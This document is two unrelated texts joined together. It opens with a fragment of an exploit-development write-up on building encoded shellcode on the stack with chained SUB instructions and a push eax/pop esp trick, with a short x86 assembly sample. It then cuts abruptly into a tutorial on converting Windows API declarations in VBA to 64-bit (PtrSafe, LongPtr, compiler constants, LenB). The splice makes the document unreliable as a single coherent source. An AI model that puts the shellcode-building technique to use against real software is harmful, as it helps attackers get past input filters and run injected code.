So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code.

Example code:


	and eax, 0x454e4f4a	;  example of how to zero out eax(unrelated)
	and eax, 0x3a313035
	
	
	push esp
	pop eax
	sub eax, 0x39393333	; construct 860 bytes of room on the stack
	sub eax, 0x72727550	
	sub eax, 0x54545421
	
	push eax		; save into esp
	pop esp

Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard.

How to convert Windows API declarations in VBA for 64-bit

Compile error message for legacy API declaration

Since Office 2010 all the Office applications including Microsoft Access and VBA are available as a 64-bit edition in addition to the classic 32-bit edition.

To clear up an occasional misconception. You do not need to install Office/Access as 64-bit application just because you got a 64-bit operating system. Windows x64 provides an excellent 32-bit subsystem that allows you to run any 32-bit application without drawbacks.

For now, 64-bit Office/Access still is rather the exception than the norm, but this is changing more and more.

Access — 32-bit vs. 64-bit

If you are just focusing on Microsoft Access there is actually no compelling reason to use the 64-bit edition instead of the 32-bit edition. Rather the opposite is true. There are several reasons not to use 64Bit Access.

  • Many ActiveX-Controls that are frequently used in Access development are still not available for 64-bit. Yes, this is still a problem in 2017, more than 10 years after the first 64Bit Windows operating system was released.
  • Drivers/Connectors for external systems like ODBC-Databases and special hardware might not be available. – Though this should rarely be an issue nowadays. Only if you need to connect to some old legacy systems this might still be a factor.
  • And finally, Access applications using the Windows API in their VBA code will require some migration work to function properly in an x64-environment.

There is only one benefit of 64-bit Access I’m aware of. When you open multiple forms at the same time that contain a large number of sub-forms, most likely on a tab control, you might run into out-of-memory-errors on 32-bit systems. The basic problem exists with 64-bit Access as well, but it takes much longer until you will see any memory related error.

Unfortunately (in this regard) Access is part of the Office Suite as is Microsoft Excel. For Excel, there actually are use cases for the 64-Bit edition. If you use Excel to calculate large data models, e.g. financial risk calculations, you will probably benefit from the additional memory available to a 64-bit application.

So, whether you as an Access developer like it or not, you might be confronted with the 64-bit edition of Microsoft Access because someone in your or your client’s organization decided they will install the whole Office Suite in 64-bit. – It is not possible to mix and match 32- and 64-bit applications from the Microsoft Office suite.

I can’t do anything about the availability of third-party-components, so in this article, I’m going to focus on the migration of Win-API calls in VBA to 64-bit compatibility.

Migrate Windows API-Calls in VBA to 64-bit

Fortunately, the Windows API was completely ported to 64-bit. You will not encounter any function, which was available on 32-bit but isn’t anymore on 64-bit. – At least I do not know of any.

However, I frequently encounter several common misconceptions about how to migrate your Windows API calls. I hope I will be able to debunk them with this text.

But first things first. The very first thing you will encounter when you try to compile an Access application with an API declaration that was written for 32-bit in VBA in 64-bit Access is an error message.

Compile error: The code in this project must be updated for use on 64-bit systems. Please review and update Declare statements and then mark them with the PtrSafe attribute.

This message is pretty clear about the problem, but you need further information to implement the solution.

With the introduction of Access 2010, Microsoft published an article on 32- and 64-Compatibility in Access. In my opinion, that article was comprehensive and pretty good, but many developers had the opinion it was insufficient.

Just recently there was a new, and in my opinion excellent, introduction to the 64-bit extensions in VBA7 published on MSDN. It actually contains all the information you need. Nevertheless, it makes sense to elaborate on how to apply it to your project.

The PtrSafe keyword

With VBA7 (Office 2010) the new PtrSafe keyword was added to the VBA language. This new keyword can (should) be used in DeclareStatements for calls to external DLL-Libraries, like the Windows API.

What does PtrSafe do? It actually does … nothing. Correct, it has no effect on how the code works at all.

The only purpose of the PtrSafe attribute is that you, as the developer, explicitly confirm to the VBA runtime environment that you checked your code to handle any pointers in the declared external function call correctly.

As the data type for pointers is different in a 64-bit environment (more on that in a moment) this actually makes sense. If you would just run your 32-bit API code in a 64-bit context, it would work; sometimes. Sometimes it would just not work. And sometimes it would overwrite and corrupt random areas of your computer’s memory and cause all sorts of random application instability and crashes. These effects would be very hard to track down to the incorrect API-Declarations.

For this understandable reason, the PtrSafe keyword is mandatory in 64-bit VBA for each external function declaration with the DeclareStatement. The PtrSafe keyword can be used in 32-bit VBA as well but is optional there for downward compatibility.

Public Declare PtrSafe Sub Sleep Lib «kernel32» (ByVal dwMilliseconds As Long)

The LongLong type

The data types Integer (16-bit Integer) and Long (32-bit Integer) are unchanged in 64-bit VBA. They are still 2 bytes and 4 bytes in size and their range of possible values is the same as it were before on 32-bit. This is not only true for VBA but for the whole Windows 64-bit platform. Generic data types retain their original size.

Now, if you want to use a true 64-bit Integer in VBA, you have to use the new LongLong data type. This data type is actually only available in 64-bit VBA, not in the 32-bit version. In context with the Windows API, you will actually use this data type only very, very rarely. There is a much better alternative.

The LongPtr data type

On 32-bit Windows, all pointers to memory addresses are 32-bit Integers. In VBA, we used to declare those pointer variables as Long. On 64-bit Windows, these pointers were changed to 64-bit Integers to address the larger memory space. So, obviously, we cannot use the unchanged Long data type anymore.

In theory, you could use the new LongLong type to declare integer pointer variables in 64-bit VBA code. In practice, you absolutely should not. There is a much better alternative.

Particularly for pointers, Microsoft introduced an all new and very clever data type. The LongPtr data type. The really clever thing about the LongPtr type is, it is a 32-bit Integer if the code runs in 32-bit VBA and it becomes a 64-bit Integer if the code runs in 64-bit VBA.

LongPtr is the perfect type for any pointer or handle in your Declare Statement. You can use this data type in both environments and it will always be appropriately sized to handle the pointer size of your environment.

Misconception: “You should change all Long variables in your Declare Statements and Type declarations to be LongPtr variables when adapting your code for 64-bit.”

Wrong!

As mentioned above, the size of the existing, generic 32-bit data types has not changed. If an API-Function expected a Long Integer on 32-bit it will still expect a Long Integer on 64-bit.

Only if a function parameter or return value is representing a pointer to a memory location or a handle (e.g. Window Handle (HWND) or Picture Handle), it will be a 64-bit Integer. Only these types of function parameters should be declared as LongPtr.

If you use LongPtr incorrectly for parameters that should be plain Long Integer your API calls may not work or may have unexpected side effects. Particularly if you use LongPtr incorrectly in Type declarations. This will disrupt the sequential structure of the type and the API call will raise a type mismatch exception.

Public Declare PtrSafe Function ShowWindow Lib «user32» (ByVal hWnd As LongPtr, ByVal nCmdShow As Long) As Boolean

The hWnd argument is a handle of a window, so it needs to be a LongPtr. nCmdShow is an int32, it should be declared as Long in 32-bit and in 64-bit as well.

Do not forget a very important detail. Not only your Declare Statement should be written with the LongPtr data type, your procedures calling the external API function must, in fact, use the LongPtr type as well for all variables, which are passed to such a function argument.

VBA7 vs WIN64 compiler constants

Also new with VBA7 are the two new compiler constants Win64 and VBA7VBA7 is true if your code runs in the VBA7-Environment (Access/Office 2010 and above). Win64 is true if your code actually runs in the 64-bit VBA environment. Win64 is not true if you run a 32-Bit VBA Application on a 64-bit system.

Misconception: “You should use the WIN64 compiler constants to provide two versions of your code if you want to maintain compatibility with 32-bit VBA/Access.”

Wrong!

For 99% of all API declarations, it is completely irrelevant if your code runs in 32-bit VBA or in 64-bit VBA.

As explained above, the PtrSafe Keyword is available in 32-bit VBA as well. And, more importantly, the LongPtr data type is too. So, you can and should write API code that runs in both environments. If you do so, you’ll probably never need to use conditional compilation to support both platforms with your code.

However, there might be another problem. If you only target Access (Office) 2010 and newer, my above statement is unconditionally correct. But if your code should run with older version of Access as well, you need to use conditional compilation indeed. But you still do not need to care about 32/64-Bit. You need to care about the Access/VBA-Version you code is running in.

You can use the VBA7 compiler constant to write code for different versions of VBA. Here is an example for that.

Private Const SW_MAXIMIZE As Long = 3 #If VBA7 Then Private Declare PtrSafe Function ShowWindow Lib «USER32» _ (ByVal hwnd As LongPtr, ByVal nCmdShow As Long) As Boolean Private Declare PtrSafe Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr #Else Private Declare Function ShowWindow Lib «USER32» _ (ByVal hwnd As Long, ByVal nCmdShow As Long) As Boolean Private Declare Function FindWindow Lib «USER32» Alias «FindWindowA» _ (ByVal lpClassName As String, ByVal lpWindowName As String) As Long #End If Public Sub MaximizeWindow(ByVal WindowTitle As String) #If VBA7 Then Dim hwnd As LongPtr #Else Dim hwnd As Long #End If hwnd = FindWindow(vbNullString, WindowTitle) If hwnd <> 0 Then Call ShowWindow(hwnd, SW_MAXIMIZE) End If End Sub

Now, here is a screenshot of that code in the 64-bit VBA-Editor. Notice the red highlighting of the legacy declaration. This code section is marked, but it does not produce any actual error. Due to the conditional compilation, it will never be compiled in this environment.

Syntax error higlighting in x64

When to use the WIN64 compiler constant?

There are situations where you still want to check for Win64. There are some new API functions available on the x64 platform that simply do not exist on the 32-bit platform. So, you might want to use a new API function on x64 and a different implementation on x86 (32-bit).

A good example for this is the GetTickCount function. This function returns the number of milliseconds since the system was started. Its return value is a Long. The function can only return the tick count for 49.7 days before the maximum value of Long is reached. To improve this, there is a newer GetTickCount64 function. This function returns an ULongLong, a 64-bit unsigned integer. The function is available on 32-bit Windows as well, but we cannot use it there because we have no suitable data type in VBA to handle its return value.

If you want to use this the 64bit version of the function when your code is running in a 64-bit environment, you need to use the Win64constant.

#If Win64 Then Public Declare PtrSafe Function GetTickCount Lib «Kernel32» Alias «GetTickCount64» () As LongPtr #Else Public Declare PtrSafe Function GetTickCount Lib «Kernel32» () As LongPtr #End If

In this sample, I reduced the platform dependent code to a minimum by declaring both versions of the function as GetTickCount. Only on 64-bit, I use the alias GetTickCount64 to map this to the new version of this function. The “correct” return value declaration would have been LongLong for the 64-bit version and just Long for the 32-bit version. I use LongPtr as return value type for both declarations to avoid platform dependencies in the calling code.

A common pitfall — The size of user-defined types

There is a common pitfall that, to my surprise, is hardly ever mentioned.

Many API-Functions that need a user-defined type passed as one of their arguments expect to be informed about the size of that type. This usually happens either by the size being stored in a member inside the structure or passed as a separate argument to the function.

Frequently developers use the Len-Function to determine the size of the type. That is incorrect, but it works on the 32-bit platform — by pure chance. Unfortunately, it frequently fails on the 64-bit platform.

To understand the issue, you need to know two things about Window’s inner workings.

  1. The members of user-defined types are aligned sequentially in memory. One member after the other.
  2. Windows manages its memory in small chunks. On a 32-bit system, these chunks are always 4 bytes big. On a 64-bit system, these chunks have a size of 8 bytes.

If several members of a user-defined type fit into such a chunk completely, they will be stored in just one of those. If a part of such a chunk is already filled and the next member in the structure will not fit in the remaining space, it will be put in the next chunk and the remaining space in the previous chunk will stay unused. This process is called padding.

Regarding the size of user-defined types, the Windows API expects to be told the complete size the type occupies in memory. Including those padded areas that are empty but need to be considered to manage the total memory area and to determine the exact positions of each of the members of the type.

The Len-Function adds up the size of all the members in a type, but it does not count the empty memory areas, which might have been created by the padding. So, the size computed by the Len-Function is not correct! — You need to use the LenB-Function to determine the total size of the type in memory.

Here is a small sample to illustrate the issue:

Public Type smallType a As Integer b As Long x As LongPtr End Type Public Sub testTypeSize() Dim s As smallType Debug.Print «Len: « & Len(s) Debug.Print «LenB: « & LenB(s) End Sub

On 32-bit the Integer is two bytes in size but it will occupy 4 bytes in memory because the Long is put in the next chunk of memory. The remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 10 bytes, but the whole type is 12 bytes in memory.

On 64-bit the Integer and the Long are 6 bytes total and will fit into the first chunk together. The LongPtr (now 8 bytes in size) will be put into the net chunk of memory and once again the remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 14 bytes, but the whole type is 16 bytes in memory.

So, if the underlying mechanism exists on both platforms, why is this not a problem with API calls on 32-bit? — Simply by pure chance. To my knowledge, there is no Windows API function that explicitly uses a datatype smaller than a DWORD (Long) as a member in any of its UDT arguments.

Wrap up

With the content covered in this article, you should be able to adapt most of your API-Declarations to 64-bit.

Many samples and articles on this topic available on the net today are lacking sufficient explanation to highlight the really important issues. I hope I was able to show the key facts for a successful migration.

Always keep in mind, it is actually not that difficult to write API code that is ready for 64-bit. — Good luck!